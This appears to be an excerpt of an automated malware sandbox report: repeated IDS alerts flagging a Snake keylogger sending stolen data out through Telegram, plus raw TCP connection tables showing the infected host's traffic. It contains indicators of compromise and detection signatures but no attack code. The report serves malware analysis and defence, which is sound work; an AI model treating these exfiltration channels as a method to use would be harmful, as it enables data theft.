2025-01-10T23:12:02.789544+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49980 | 132.226.247.73 | 80 | TCP
2025-01-10T23:12:03.365561+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49981 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:03.589477+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49981 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:04.932807+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49983 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:05.263746+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49983 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:06.599379+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:06.806211+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:08.162259+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49987 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:08.373482+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49987 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:09.776645+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49989 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:09.991034+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49989 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:11.295791+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49992 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:11.627973+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49992 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:12.996532+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49994 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:13.282728+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49994 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:14.599622+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49996 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:14.861651+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49996 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:16.206189+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49998 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:17.130510+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49998 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:18.465680+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50000 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:18.755647+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50000 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:20.069772+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50002 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:20.282175+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50002 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:21.674756+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50004 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:21.929004+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50004 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:23.301443+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50006 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:23.510404+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50006 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:25.862990+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50008 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:26.221835+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50008 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:27.550625+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50010 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:27.866639+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50010 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:29.219177+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50012 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:29.438612+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50012 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:30.766263+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50014 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:30.991536+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50014 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:32.422148+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50016 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:32.714699+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50016 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:34.024915+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50018 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:34.305790+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50018 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:35.619872+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50020 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:35.900793+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50020 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:37.213771+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50022 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:37.515075+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50022 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:38.823917+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 50024 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:39.041100+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50024 | 149.154.167.220 | 443 | TCP
                                                                                                          2025-01-10T23:12:40.369055+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950026149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:40.813386+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950026149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:42.142601+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950028149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:42.356372+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950028149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:43.684809+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950030149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:43.983727+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950030149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:45.322823+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950032149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:45.635718+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950032149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:46.956393+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950034149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:47.246674+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950034149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:48.591683+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950036149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:48.883420+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950036149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:50.197296+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950038149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:50.406858+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950038149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:51.750955+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950040149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:52.085861+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950040149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:53.422065+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950042149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:53.725174+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950042149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:55.063104+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950044149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:55.278857+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950044149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:56.595449+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950046149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:56.980269+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950046149.154.167.220443TCP
                                                                                                          2025-01-10T23:13:01.340423+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950048149.154.167.220443TCP
                                                                                                          2025-01-10T23:13:01.679383+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950048149.154.167.220443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Jan 10, 2025 23:11:51.246658087 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.246675968 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.246714115 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.250756025 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.250833988 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.250925064 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.250969887 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.255212069 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.255290031 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.255306005 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.255346060 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260473967 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.260536909 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.260566950 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260581017 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.260590076 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260615110 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.260628939 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260654926 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260674000 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260689974 CET44349974142.250.181.225192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.260699987 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.260732889 CET49974443192.168.2.9142.250.181.225
                                                                                                          Jan 10, 2025 23:11:51.684545040 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:51.689374924 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.689455032 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:51.689646006 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:51.694447041 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:52.399348974 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:52.404653072 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:52.409651041 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:52.623148918 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:52.664493084 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:53.090621948 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.090679884 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.090756893 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.093246937 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.093266964 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.562853098 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.562927961 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.567054033 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.567064047 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.567392111 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.572407961 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.619328022 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.716386080 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.716579914 CET44349976104.21.96.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.716667891 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:53.722692966 CET49976443192.168.2.9104.21.96.1
                                                                                                          Jan 10, 2025 23:11:59.138529062 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:11:59.143429995 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:59.353190899 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:11:59.365492105 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:11:59.365549088 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:11:59.365609884 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:11:59.366173983 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:11:59.366188049 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:11:59.398915052 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.009207010 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.009301901 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.011431932 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.011444092 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.011751890 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.013268948 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.055366039 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.055486917 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.055499077 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.281918049 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.282054901 CET44349977149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.282130003 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.282722950 CET49977443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:00.508394003 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.509582043 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.513525963 CET8049975132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.513583899 CET4997580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.514353991 CET8049978132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:00.514417887 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.514538050 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:00.519253969 CET8049978132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.186801910 CET8049978132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.188483000 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:01.188539028 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.188620090 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:01.189344883 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:01.189356089 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.242640972 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:01.811489105 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.813391924 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:01.813424110 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:01.813467979 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:01.813477039 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.042906046 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.042999983 CET44349979149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.043066025 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:02.043637037 CET49979443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:02.047421932 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:02.048793077 CET4998080192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:02.052464962 CET8049978132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.052580118 CET4997880192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:02.053644896 CET8049980132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.053776026 CET4998080192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:02.053879976 CET4998080192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:02.058702946 CET8049980132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.727355957 CET8049980132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.729614019 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:02.729676008 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.729738951 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:02.730355978 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:02.730370998 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:02.789544106 CET4998080192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:03.358978987 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.365427017 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:03.365447044 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.365509987 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:03.365514040 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.589632988 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.589827061 CET44349981149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.589895964 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:03.590315104 CET49981443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:03.595184088 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:03.599998951 CET8049982132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:03.600090981 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:03.600290060 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:03.605067968 CET8049982132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.286410093 CET8049982132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.288032055 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:04.288083076 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.288184881 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:04.288506031 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:04.288520098 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.336559057 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:04.929580927 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.932656050 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:04.932681084 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:04.932777882 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:04.932782888 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.263801098 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.263905048 CET44349983149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.263974905 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:05.264652967 CET49983443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:05.268471956 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:05.269191027 CET4998480192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:05.273525953 CET8049982132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.273631096 CET4998280192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:05.273947001 CET8049984132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.274009943 CET4998480192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:05.274123907 CET4998480192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:05.278928041 CET8049984132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.984201908 CET8049984132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.986001968 CET49985443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:05.986052036 CET44349985149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:05.986155033 CET49985443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:05.986579895 CET49985443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:05.986593962 CET44349985149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:06.039518118 CET4998480192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:06.594722033 CET44349985149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:06.596864939 CET49985443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:06.596894026 CET44349985149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:06.596966982 CET49985443192.168.2.9149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 10, 2025 23:12:06.596977949 CET  443          49985      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:06.806262016 CET  443          49985      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:06.806372881 CET  443          49985      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:06.806431055 CET  49985        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:06.806885004 CET  49985        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:06.810456991 CET  49984        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:06.811644077 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:06.815484047 CET  80           49984      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:06.815556049 CET  49984        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:06.816521883 CET  80           49986      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:06.816593885 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:06.816690922 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:06.821516991 CET  80           49986      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:07.507061958 CET  80           49986      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:07.508620024 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:07.508671999 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:07.508758068 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:07.509025097 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:07.509037971 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:07.555201054 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.117875099 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:08.162035942 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:08.162067890 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:08.162127018 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:08.162136078 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:08.373636961 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:08.373852015 CET  443          49987      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:08.373909950 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:08.383491993 CET  49987        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:08.397205114 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.398389101 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.402223110 CET  80           49986      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:08.402287960 CET  49986        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.403219938 CET  80           49988      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:08.403290987 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.403481007 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:08.408269882 CET  80           49988      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:09.103066921 CET  80           49988      132.226.247.73   192.168.2.9
